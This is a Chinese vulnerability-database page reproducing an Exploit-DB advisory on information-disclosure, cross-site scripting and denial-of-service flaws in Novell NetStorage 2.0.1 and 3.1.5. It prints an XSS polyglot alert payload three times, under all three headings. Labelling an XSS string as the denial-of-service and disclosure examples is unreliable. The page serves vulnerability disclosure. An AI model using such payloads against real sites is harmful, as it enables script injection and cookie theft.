Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057597 漏洞类型
发布时间 2009-03-26 更新时间 2009-03-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Novell CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32876
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/34267/info

Novell NetStorage is prone to the following remote vulnerabilities:

- An information-disclosure vulnerability
- A cross-site scripting vulnerability
- A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.

The following are vulnerable:

NetStorage 3.1.5-19 on Open Enterprise Server (OES)
NetStorage 2.0.1 on NetWare 6.5 SP6 

The following examples are available:

Cross-site scripting:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Denial of service:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Information disclosure:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>